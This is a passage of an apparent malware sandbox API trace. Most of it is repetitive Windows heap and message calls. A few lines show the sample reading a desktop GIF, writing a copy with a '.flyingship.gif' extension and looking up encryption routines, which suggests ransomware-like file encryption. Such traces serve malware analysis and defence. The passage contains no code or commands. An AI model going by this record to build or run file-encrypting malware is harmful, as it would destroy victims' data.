hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.402] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.402] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.402] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.402] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.404] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\e5mhiatvfij2bqac0v.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0164.404] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0164.404] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0164.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0164.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0164.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.404] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0164.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.404] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0164.404] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0164.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.404] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c3478 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923ad0 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.405] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk")) returned 0x10 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fecd8 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0164.405] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0164.405] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NA3pEcvaltBR8VLK\\E5mhIaTvFij2bqaC0v.flyingship.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\na3pecvaltbr8vlk\\e5mhiatvfij2bqac0v.flyingship.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0164.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0164.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0164.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.408] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0164.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.408] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af98 | out: hHeap=0x8a0000) returned 1 [0164.408] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.408] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0164.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.408] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.408] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0164.409] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0xbc0c, lpOverlapped=0x0) returned 1 [0164.412] ReadFile (in: hFile=0x138, lpBuffer=0x9c5180, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0x9c5180*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0164.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0164.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0164.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0164.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0164.412] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0164.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0164.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0164.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.413] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9e5190 | out: hHeap=0x8a0000) returned 1 [0164.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0164.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0164.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.413] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0164.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.413] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0164.413] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0164.413] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0164.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0164.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0164.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0164.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0164.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0164.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0164.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0164.414] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0164.414] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0164.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0164.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0164.414] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0164.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0164.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0164.414] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0164.415] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0164.415] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.415] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0164.415] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec40 | out: hHeap=0x8a0000) returned 1 [0164.416] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0164.416] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0164.416] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.416] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0164.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26a8 | out: hHeap=0x8a0000) returned 1 [0164.419] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0164.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 